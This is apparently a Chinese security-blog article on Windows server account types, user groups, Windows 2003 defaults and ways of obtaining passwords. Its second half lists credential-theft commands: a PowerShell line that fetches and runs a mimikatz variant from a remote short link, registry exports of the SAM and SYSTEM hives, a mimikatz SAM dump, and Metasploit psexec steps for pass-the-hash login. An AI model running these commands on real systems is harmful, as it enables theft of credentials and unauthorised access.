Windows 服务器权限和密码获取方式介绍

一:windows服务权限

0x01 Windows常见用户

  • System 本地机器最高权限
  • Administrator 管理员权限
  • Guest 来宾账号 权限极低 默认被禁用


0x02 Windows 常见用户组

  • Administrators 机器最高权限
  • Backup Operators 和Administrators差不多
  • Guests 权限极低
  • Nework Configuration Operators 03新增用户组 限管理网络配置
  • Performmance Log Users 03新增用户组 远程安排性能计数器的日志工作
  • Performmance Monitor Users 远程监控计算机运行情况
  • Power Users 权限小于Administrators大于Guest
  • Print Operators 打印,权限和Administrators差不多
  • Users 本地机器所有的用户账号 低权限

0x03 windows2003默认设置

  • 默认只安装静态HTTP服务器
  • 增强的文件访问控制 //匿名账号不具有根目录写入权限
  • 父目录被禁用 //避免路径穿越问题
  • 坚持最小特权原则
    • Http.sys 代码以local system权限执行
    • 工作进程以Network services权限执行

0x04 不同环境下的木马运行区别

  • 系统运行木马和webshell下运行的区别
    • 系统运行是系统权限,webshell下是当前运行中间件权限运行
  • iis、apache与第三方软件搭建的环境,权限差别在哪里
    • iis下是以IIS_IUSER权限运行,第三方一般是管理员权限


二:Windows密码获取与hash登陆

0x01 密码获取方法

  • Mimikatz
  • Pwdump
  • Getpassword
  • wce
  • powershell远程加载mimikatz读取
    • powershell "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/2mwWXzS'); Invoke-Drunkenkatz -RandomVar111"
  • 注册表导出
    • reg save hklm\sam sam.hiv
    • reg save hklm\system sys.hiv
    • lsadump::sam /sam:Sam.hiv /system:Sys.hiv (mimikatz运行该命令)

0x02 利用msf进行hash登陆

  • use exploit/multi/handler
  • set payload exploit/windows/smb/psexec
  • set RHOST ip
  • set SMBUser 登陆账号
  • set SMBPass 登陆hash
  • run

0x03 hash破解

  • LC5暴力破解
  • Ophcrack
  • www.cmd5.com
  • www.somd5.com


以上就是蓝域小编为您带来的关于 Windows 服务器权限和密码获取方式介绍
(如果您喜欢本篇文章转载请注明来源:http://www.yemogege.cn/wzaq-stwz/344.html

版权保护: 本文由admin所发布,转载请保留本文链接: http://www.yemogege.cn/wzaq-stwz/344.html

免责声明:蓝域安全网所发布的一切渗透技术视频文章,逆向脱壳病毒分析教程,以及相关实用源码仅限用于学习和研究目的
请勿用于商业用途。如有侵权、不妥之处,请联系站长并出示版权证明以便删除! 

侵权删帖/违法举报/投稿等事物联系邮箱:yemogege@vip.qq.com 网站地图